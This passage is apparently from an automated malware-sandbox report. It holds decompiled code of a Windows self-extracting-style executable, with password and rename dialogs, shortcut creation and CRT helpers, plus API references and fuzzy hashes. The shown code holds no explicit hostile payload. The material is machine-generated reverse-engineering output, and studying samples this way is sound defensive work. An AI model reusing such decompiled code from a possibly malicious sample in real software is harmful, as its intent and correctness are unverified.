                												 *__eax = __cx;
                												__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
                											}
                											L160:
                											__eflags =  *((short*)(__ebp - 0x11894));
                											if( *((short*)(__ebp - 0x11894)) != 0) {
                												__ebp - 0x9894 = __ebp - 0x11894;
                												__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
                											}
                											__ebp - 0xb894 = __ebp - 0x688c;
                											__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
                											__eflags =  *(__ebp - 0x2844);
                											if(__eflags == 0) {
                												__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
                											}
                											__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
                											__eflags =  *((short*)(__ebp - 0x17894));
                											if(__eflags != 0) {
                												__ebp - 0x17894 = __ebp - 0x2844;
                												E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
                												__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
                											}
                											__ebp - 0x2844 = __ebp - 0xc894;
                											__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
                											__eflags =  *(__ebp - 0x13894);
                											__eax = __ebp - 0x13894;
                											if(__eflags == 0) {
                												__eax = __ebp - 0x19894;
                											}
                											__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
                											__eax = __ebp - 0x2844;
                											__eflags = E003DB92D(__ebp - 0x2844);
                											if(__eflags == 0) {
                												L170:
                												__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
                												goto L171;
                											} else {
                												L169:
                												__eflags = __eax;
                												if(__eflags == 0) {
                													L171:
                													__ebx = 0;
                													__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
                													__ebp - 0xb894 = __ebp - 0xa894;
                													E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
                													__eax = E003DC2E4(__eflags, __ebp - 0xa894);
                													__esi =  *(__ebp - 0x1844) & 0x0000ffff;
                													__eax = __ebp - 0x1844;
                													__edx =  *(__ebp - 0x9894) & 0x0000ffff;
                													__edi = __ebp - 0xa894;
                													__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
                													__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
                													asm("sbb esi, esi");
                													__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
                													__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
                													__eax = __ebp - 0x9894;
                													asm("sbb edx, edx");
                													__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
                													__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
                													__eax = __ebp - 0x15894;
                													asm("sbb ecx, ecx");
                													__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
                													 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
                													asm("sbb eax, eax");
                													 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
                													__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
                													__eflags =  *(__ebp - 0xc894) - __bx;
                													if( *(__ebp - 0xc894) != __bx) {
                														_push(0);
                														__eax = __ebp - 0xc894;
                														_push(__ebp - 0xc894);
                														_push(5);
                														_push(0x1000);
                														__eax =  *0x43308c();
                													}
                													goto L175;
                												}
                												goto L170;
                											}
                										}
                									case 0xa:
                										L173:
                										__eflags = __ebx - 7;
                										if(__ebx == 7) {
                											 *0x41a470 = 1;
                										}
                										goto L175;
                									case 0xb:
                										L81:
                										__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                										__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
                										__eflags = __eax - 0x46;
                										if(__eax == 0x46) {
                											 *0x418461 = 1;
                										} else {
                											__eflags = __eax - 0x55;
                											if(__eax == 0x55) {
                												 *0x418462 = 1;
                											} else {
                												__eax = 0;
                												 *0x418461 = __al;
                												 *0x418462 = __al;
                											}
                										}
                										goto L175;
                									case 0xc:
                										L103:
                										 *0x427b7a = 1;
                										__eax = __eax + 0x427b7a;
                										_t117 = __esi + 0x39;
                										 *_t117 =  *(__esi + 0x39) + __esp;
                										__eflags =  *_t117;
                										__ebp = 0xffffa774;
                										if( *_t117 != 0) {
                											_t119 = __ebp - 0x588c; // 0xffff4ee8
                											__eax = _t119;
                											 *0x40e728 = E003E1FA7(_t119);
                										}
                										goto L175;
                								}
                								L2:
                								_push(0x1000);
                								_push(_t299);
                								_push(_t227);
                								_t227 = E003EAF98();
                								_t299 = _t299 + 0x2000;
                								_t296 = _t296 - 1;
                								if(_t296 != 0) {
                									goto L2;
                								} else {
                									_t300 = _t296;
                									goto L4;
                								}
                							}
                							L176:
                							 *[fs:0x0] =  *((intOrPtr*)(_t304 - 0xc));
                							return _t226;
                						}
                						L100:
                						if(_t279 != 6) {
                							goto L175;
                						}
                						L101:
                						_push(0);
                						L102:
                						_push(_t295);
                						_push(_t221);
                						_push( *((intOrPtr*)(_t304 + 8)));
                						E003ED78F(_t304);
                						goto L175;
                					}
                					L97:
                					if(_t279 != 9) {
                						goto L175;
                					}
                					L98:
                					_push(1);
                					goto L102;
                				}
                			}













                APIs
                • _wcschr.LIBVCRUNTIME ref: 003ECD84
                  • Part of subcall function 003EAF98: _wcschr.LIBVCRUNTIME ref: 003EB033
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr$CompareString
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 69343711-3358265660
                • Opcode ID: 7b394a923ea77fc2f38090eea43dc70e2119ce39163eefd0363502e4043f5f4d
                • Instruction ID: 4cbfbc9b058ceda7bc41f9c059216f2b37ff3783dbf0d0784add5be646235873
                • Opcode Fuzzy Hash: 7b394a923ea77fc2f38090eea43dc70e2119ce39163eefd0363502e4043f5f4d
                • Instruction Fuzzy Hash: 803185759002A9AADF26CB56DC41EEF73BCEB54350F414366E901E71C0EBB09E858FA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E003DB991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
                				short _t10;
                				short _t13;
                				signed int _t14;
                				short* _t19;
                				signed int _t20;
                				void* _t22;
                				signed short* _t26;
                				signed int _t28;
                				signed int _t30;
                
                				_t19 = _a8;
                				_t26 = _a4;
                				 *_t19 = 0;
                				_t10 = E003DBC98(__eflags, _t26);
                				_t20 =  *_t26 & 0x0000ffff;
                				if(_t10 != 0) {
                					return E003D4092(_t19, _a12, L"%c:\\", _t20);
                				}
                				_t28 = 0x5c;
                				__eflags = _t20 - _t28;
                				if(_t20 == _t28) {
                					__eflags = _t26[1] - _t28;
                					if(_t26[1] == _t28) {
                						_push(_t28);
                						_push( &(_t26[2]));
                						_t10 = E003F22C6(_t20);
                						_pop(_t22);
                						__eflags = _t10;
                						if(_t10 != 0) {
                							_push(_t28);
                							_push(_t10 + 2);
                							_t13 = E003F22C6(_t22);
                							__eflags = _t13;
                							if(_t13 == 0) {
                								_t14 = E003F3E13(_t26);
                							} else {
                								_t14 = (_t13 - _t26 >> 1) + 1;
                							}
                							__eflags = _t14 - _a12;
                							asm("sbb esi, esi");
                							_t30 = _t28 & _t14;
                							E003F60C2(_t19, _t26, _t30);
                							_t10 = 0;
                							__eflags = 0;
                							 *((short*)(_t19 + _t30 * 2)) = 0;
                						}
                					}
                				}
                				return _t10;
                			}













                APIs
                • _swprintf.LIBCMT ref: 003DB9B8
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • _wcschr.LIBVCRUNTIME ref: 003DB9D6
                • _wcschr.LIBVCRUNTIME ref: 003DB9E6
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: af20c860664a4390912866fbdce0b1447bec2cb5eab102145fe37a503696458f
                • Instruction ID: cf6e2050fb53f201efa5f8b6a41e90ad4e286a2a8c38068f21aece138c74a159
                • Opcode Fuzzy Hash: af20c860664a4390912866fbdce0b1447bec2cb5eab102145fe37a503696458f
                • Instruction Fuzzy Hash: 3C01F563504312F9DA326B35AC42D7BE7ACEF957B0B56481BF644DB282EB30D84482B1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003EB270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                				short _v260;
                				void* __ebx;
                				void* _t15;
                				signed short _t24;
                				struct HWND__* _t28;
                				intOrPtr _t29;
                				void* _t30;
                
                				_t24 = _a12;
                				_t29 = _a8;
                				_t28 = _a4;
                				if(E003D1316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
                					L10:
                					return 1;
                				}
                				_t30 = _t29 - 0x110;
                				if(_t30 == 0) {
                					SetDlgItemTextW(_t28, 0x67, _a16);
                					goto L10;
                				}
                				if(_t30 != 1) {
                					L5:
                					return 0;
                				}
                				_t15 = (_t24 & 0x0000ffff) - 1;
                				if(_t15 == 0) {
                					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
                					E003DF3FA(_t24, 0x427a78,  &_v260);
                					E003DF445( &_v260, 0x80);
                					_push(1);
                					L7:
                					EndDialog(_t28, ??);
                					goto L10;
                				}
                				if(_t15 == 1) {
                					_push(0);
                					goto L7;
                				}
                				goto L5;
                			}











                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003EB2BE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 003EB2D6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 003EB304
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1$xzB
                • API String ID: 445417207-2334712647
                • Opcode ID: a840aa337a2d2765ca7715081fd68b1b15ce868077c336b04f709909f5ae50ad
                • Instruction ID: 7b079ac68ea01cc504106e77572ca5508c57304c53a3714b05de5ac829c73d89
                • Opcode Fuzzy Hash: a840aa337a2d2765ca7715081fd68b1b15ce868077c336b04f709909f5ae50ad
                • Instruction Fuzzy Hash: EE11E132900168BADB239E65AC8AFFFB77CEF09701F100521FB45B61C0C7A59A4487A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E003EB6DD(void* __ecx, void* __edx, void* __fp0) {
                				intOrPtr _v20;
                				intOrPtr _v24;
                				void _v28;
                				void* _t8;
                				void* _t11;
                				void* _t13;
                				void* _t15;
                				signed int _t18;
                				signed int _t19;
                				void* _t21;
                				void* _t22;
                				void* _t26;
                				void* _t33;
                
                				_t33 = __fp0;
                				_t21 = __edx;
                				_t8 = LoadBitmapW( *0x411028, 0x65);
                				_t22 = _t8;
                				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
                				if(_t22 != 0) {
                					L2:
                					GetObjectW(_t22, 0x18,  &_v28);
                					L4:
                					_t11 = E003EA5C6(_t29);
                					if(_t11 != 0) {
                						if(_t19 != 0) {
                							_push(0x66);
                							"QQVWhdG@"();
                							_t26 = _t11;
                							if(_t26 != 0) {
                								DeleteObject(_t22);
                								_t22 = _t26;
                							}
                						}
                						_t13 = E003EA605(_v20);
                						_t15 = E003EA80C(_t21, _t33, _t22, E003EA5E4(_v24), _t13);
                						DeleteObject(_t22);
                						_t22 = _t15;
                					}
                					return _t22;
                				}
                				_push(0x65);
                				"QQVWhdG@"();
                				_t22 = _t8;
                				_t29 = _t22;
                				if(_t22 == 0) {
                					_v24 = 0x5d;
                					_v20 = 0x12e;
                					goto L4;
                				}
                				goto L2;
                			}

















                APIs
                • LoadBitmapW.USER32(00000065), ref: 003EB6ED
                • GetObjectW.GDI32(00000000,00000018,?), ref: 003EB712
                • DeleteObject.GDI32(00000000), ref: 003EB744
                • DeleteObject.GDI32(00000000), ref: 003EB767
                  • Part of subcall function 003EA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,003EB73D,00000066), ref: 003EA6D5
                  • Part of subcall function 003EA6C2: SizeofResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA6EC
                  • Part of subcall function 003EA6C2: LoadResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA703
                  • Part of subcall function 003EA6C2: LockResource.KERNEL32(00000000,?,?,?,003EB73D,00000066), ref: 003EA712
                  • Part of subcall function 003EA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,003EB73D,00000066), ref: 003EA72D
                  • Part of subcall function 003EA6C2: GlobalLock.KERNEL32 ref: 003EA73E
                  • Part of subcall function 003EA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 003EA7A7
                  • Part of subcall function 003EA6C2: GlobalUnlock.KERNEL32(00000000), ref: 003EA7C6
                  • Part of subcall function 003EA6C2: GlobalFree.KERNEL32 ref: 003EA7CD
                Similarity
                • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                • String ID: ]
                • API String ID: 1428510222-3352871620
                • Opcode ID: c995dc67589ecbeb4ce0c4fd19a508cbb0560bfbda8f9ced41150bc3495be296
                • Instruction ID: 9e571293d1a81e2ef125175522109750ab859298ed048e3fbd5e6bab00a2b21f
                • Opcode Fuzzy Hash: c995dc67589ecbeb4ce0c4fd19a508cbb0560bfbda8f9ced41150bc3495be296
                • Instruction Fuzzy Hash: 1501453290067167D7137B768C49ABFBAB99FC2B53F090220F940AB2D5DF31CD0946A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003ED600(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                				void* _t12;
                				WCHAR* _t16;
                				void* _t17;
                				intOrPtr _t18;
                				void* _t19;
                				struct HWND__* _t21;
                				signed short _t22;
                
                				_t16 = _a16;
                				_t22 = _a12;
                				_t21 = _a4;
                				_t18 = _a8;
                				if(E003D1316(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
                					L10:
                					return 1;
                				}
                				_t19 = _t18 - 0x110;
                				if(_t19 == 0) {
                					 *0x42fcb4 = _t16;
                					SetDlgItemTextW(_t21, 0x66, _t16);
                					SetDlgItemTextW(_t21, 0x68,  *0x42fcb4);
                					goto L10;
                				}
                				if(_t19 != 1) {
                					L5:
                					return 0;
                				}
                				_t12 = (_t22 & 0x0000ffff) - 1;
                				if(_t12 == 0) {
                					GetDlgItemTextW(_t21, 0x68,  *0x42fcb4, 0x800);
                					_push(1);
                					L7:
                					EndDialog(_t21, ??);
                					goto L10;
                				}
                				if(_t12 == 1) {
                					_push(0);
                					goto L7;
                				}
                				goto L5;
                			}











                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003ED64B
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 003ED661
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 003ED675
                • SetDlgItemTextW.USER32(?,00000068), ref: 003ED684
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 77f4297ec264729a5d6ae02f7e5bb03fe892b2104ebab5fab179f320288fe88e
                • Instruction ID: f5dbc3ccb29fea1c39e47662957479b19c74c8764a4352641a41ff7854e07800
                • Opcode Fuzzy Hash: 77f4297ec264729a5d6ae02f7e5bb03fe892b2104ebab5fab179f320288fe88e
                • Instruction Fuzzy Hash: 3401F9332442647AD2224F669E09F57776DFB5A702F910531F205A50D0C6A19905876D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003F7E24,?,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002), ref: 003F7E93
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003F7EA6
                • FreeLibrary.KERNEL32(00000000,?,?,?,003F7E24,?,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002,00000000), ref: 003F7EC9
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 5a1a70117a23906d00f5a03b02c8a1449a1da3849203c5b4802a5bb2c884ce55
                • Instruction ID: 76cd996b37d2d29ea6a5a44b0c002a322c692a1bdc6f9c03d865d9c6b0d1a2dd
                • Opcode Fuzzy Hash: 5a1a70117a23906d00f5a03b02c8a1449a1da3849203c5b4802a5bb2c884ce55
                • Instruction Fuzzy Hash: F2F06D3150111CBBDB119F95DD09BAEBFB8EF44715F0141BAF905B2150DB745E50C658
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DF2C5(struct HINSTANCE__** __ecx) {
                				void* _t5;
                				struct HINSTANCE__* _t6;
                				struct HINSTANCE__** _t9;
                
                				_t9 = __ecx;
                				if(__ecx[1] == 0) {
                					_t6 = E003E081B(L"Crypt32.dll");
                					 *__ecx = _t6;
                					if(_t6 != 0) {
                						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
                						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
                						_t9[3] = _t6;
                					}
                					_t9[1] = 1;
                					return _t6;
                				}
                				return _t5;
                			}







                APIs
                  • Part of subcall function 003E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                  • Part of subcall function 003E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003DF2E4
                • GetProcAddress.KERNEL32(004181C8,CryptUnprotectMemory), ref: 003DF2F4
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: 0201dee8deabda680608598d30084317eb7486c77e5799294050215d92615140
                • Instruction ID: 78ce679eb69fa7f179f13813cfad852821b3c93a5487a748a1235c6d4271cbd7
                • Opcode Fuzzy Hash: 0201dee8deabda680608598d30084317eb7486c77e5799294050215d92615140
                • Instruction Fuzzy Hash: ADE0DF31A00701AEC7219F35A84CB017ED86F04705B20883FE0CAB3680C6B8D0808B04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E003F2BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				signed char* _t52;
                				signed int _t53;
                				intOrPtr _t54;
                				signed int _t58;
                				signed int _t61;
                				intOrPtr _t71;
                				signed int _t75;
                				signed int _t79;
                				signed char _t81;
                				signed char _t84;
                				signed int _t85;
                				signed int _t86;
                				signed int _t97;
                				signed char _t99;
                				signed int* _t100;
                				signed char* _t103;
                				signed int _t109;
                				void* _t113;
                
                				_push(0x10);
                				_push(0x40c248);
                				E003EF5F0(__ebx, __edi, __esi);
                				_t75 = 0;
                				_t52 =  *(_t113 + 0x10);
                				_t81 = _t52[4];
                				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                					L30:
                					_t53 = 0;
                					__eflags = 0;
                					goto L31;
                				} else {
                					_t99 = _t52[8];
                					if(_t99 != 0 ||  *_t52 < 0) {
                						_t84 =  *_t52;
                						_t109 =  *(_t113 + 0xc);
                						if(_t84 >= 0) {
                							_t109 = _t109 + 0xc + _t99;
                						}
                						 *(_t113 - 4) = _t75;
                						_t103 =  *(_t113 + 0x14);
                						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
                							L10:
                							_t54 =  *((intOrPtr*)(_t113 + 8));
                							__eflags = _t84 & 0x00000008;
                							if((_t84 & 0x00000008) == 0) {
                								__eflags =  *_t103 & 0x00000001;
                								if(( *_t103 & 0x00000001) == 0) {
                									_t85 =  *(_t54 + 0x18);
                									__eflags = _t103[0x18] - _t75;
                									if(_t103[0x18] != _t75) {
                										__eflags = _t85;
                										if(_t85 == 0) {
                											goto L32;
                										} else {
                											__eflags = _t109;
                											if(_t109 == 0) {
                												goto L32;
                											} else {
                												__eflags =  *_t103 & 0x00000004;
                												_t79 = 0;
                												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
                												__eflags = _t75;
                												 *(_t113 - 0x20) = _t75;
                												goto L29;
                											}
                										}
                									} else {
                										__eflags = _t85;
                										if(_t85 == 0) {
                											goto L32;
                										} else {
                											__eflags = _t109;
                											if(_t109 == 0) {
                												goto L32;
                											} else {
                												E003F0320(_t109, E003F027C(_t85,  &(_t103[8])), _t103[0x14]);
                												goto L29;
                											}
                										}
                									}
                								} else {
                									__eflags =  *(_t54 + 0x18);
                									if( *(_t54 + 0x18) == 0) {
                										goto L32;
                									} else {
                										__eflags = _t109;
                										if(_t109 == 0) {
                											goto L32;
                										} else {
                											E003F0320(_t109,  *(_t54 + 0x18), _t103[0x14]);
                											__eflags = _t103[0x14] - 4;
                											if(_t103[0x14] == 4) {
                												__eflags =  *_t109;
                												if( *_t109 != 0) {
                													_push( &(_t103[8]));
                													_push( *_t109);
                													goto L21;
                												}
                											}
                											goto L29;
                										}
                									}
                								}
                							} else {
                								_t97 =  *(_t54 + 0x18);
                								goto L12;
                							}
                						} else {
                							_t71 =  *0x43205c; // 0x0
                							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
                							if(_t71 == 0) {
                								goto L10;
                							} else {
                								 *0x403278();
                								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
                								L12:
                								if(_t97 == 0 || _t109 == 0) {
                									L32:
                									E003F8D24(_t75, _t99, _t103, _t109);
                									asm("int3");
                									_push(8);
                									_push(0x40c268);
                									E003EF5F0(_t75, _t103, _t109);
                									_t100 =  *(_t113 + 0x10);
                									_t86 =  *(_t113 + 0xc);
                									__eflags =  *_t100;
                									if(__eflags >= 0) {
                										_t105 = _t86 + 0xc + _t100[2];
                										__eflags = _t86 + 0xc + _t100[2];
                									} else {
                										_t105 = _t86;
                									}
                									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
                									_t110 =  *(_t113 + 0x14);
                									_push( *(_t113 + 0x14));
                									_push(_t100);
                									_push(_t86);
                									_t77 =  *((intOrPtr*)(_t113 + 8));
                									_push( *((intOrPtr*)(_t113 + 8)));
                									_t58 = E003F2BDA(_t77, _t105, _t110, __eflags) - 1;
                									__eflags = _t58;
                									if(_t58 == 0) {
                										_t61 = E003F38E4(_t105, _t110[0x18], E003F027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
                									} else {
                										_t61 = _t58 - 1;
                										__eflags = _t61;
                										if(_t61 == 0) {
                											_t61 = E003F38F4(_t105, _t110[0x18], E003F027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
                										}
                									}
                									 *(_t113 - 4) = 0xfffffffe;
                									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
                									return _t61;
                								} else {
                									 *_t109 = _t97;
                									_push( &(_t103[8]));
                									_push(_t97);
                									L21:
                									 *_t109 = E003F027C();
                									L29:
                									 *(_t113 - 4) = 0xfffffffe;
                									_t53 = _t75;
                									L31:
                									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
                									return _t53;
                								}
                							}
                						}
                					} else {
                						goto L30;
                					}
                				}
                			}






















                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AdjustPointer$_abort
                • String ID:
                • API String ID: 2252061734-0
                • Opcode ID: 3f1226d03eaacf1d03afcdc8cb5d09a9fb948b53528cb860c46767c45922141c
                • Instruction ID: 15717d9b79084b314cdebae70d150d393073211d0bfa252fd9a4475131ae014a
                • Opcode Fuzzy Hash: 3f1226d03eaacf1d03afcdc8cb5d09a9fb948b53528cb860c46767c45922141c
                • Instruction Fuzzy Hash: 7A51CE7260121AEFEB2A8F18D845BBB77A4FF54310F25452DFA124B6A1D731ED80D790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E003FBF30() {
                				int _v8;
                				void* __ecx;
                				void* _t6;
                				int _t7;
                				char* _t13;
                				int _t17;
                				void* _t19;
                				char* _t25;
                				WCHAR* _t27;
                
                				_t27 = GetEnvironmentStringsW();
                				if(_t27 == 0) {
                					L7:
                					_t13 = 0;
                				} else {
                					_t6 = E003FBEF9(_t27);
                					_pop(_t19);
                					_t17 = _t6 - _t27 >> 1;
                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                					_v8 = _t7;
                					if(_t7 == 0) {
                						goto L7;
                					} else {
                						_t25 = E003F8E06(_t19, _t7);
                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                							_t13 = 0;
                						} else {
                							_t13 = _t25;
                							_t25 = 0;
                						}
                						E003F8DCC(_t25);
                					}
                				}
                				if(_t27 != 0) {
                					FreeEnvironmentStringsW(_t27);
                				}
                				return _t13;
                			}













                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 003FBF39
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003FBF5C
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003FBF82
                • _free.LIBCMT ref: 003FBF95
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003FBFA4
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 7ebdf8640dddee6fad917b6b917c21e65c216bf45abe2729fa0e7eb4290be1dd
                • Instruction ID: 96c69cb67ba2386ce827dab8eee613ea9d2a48d17f2b1c0500fc32a44d1a2eb8
                • Opcode Fuzzy Hash: 7ebdf8640dddee6fad917b6b917c21e65c216bf45abe2729fa0e7eb4290be1dd
                • Instruction Fuzzy Hash: 3D01A7F26057197FA3221A769C4DC7BEE6DDEC6BA13150129FB04DA141EF70CD0195B0
                Uniqueness

                Uniqueness Score: -1.00%

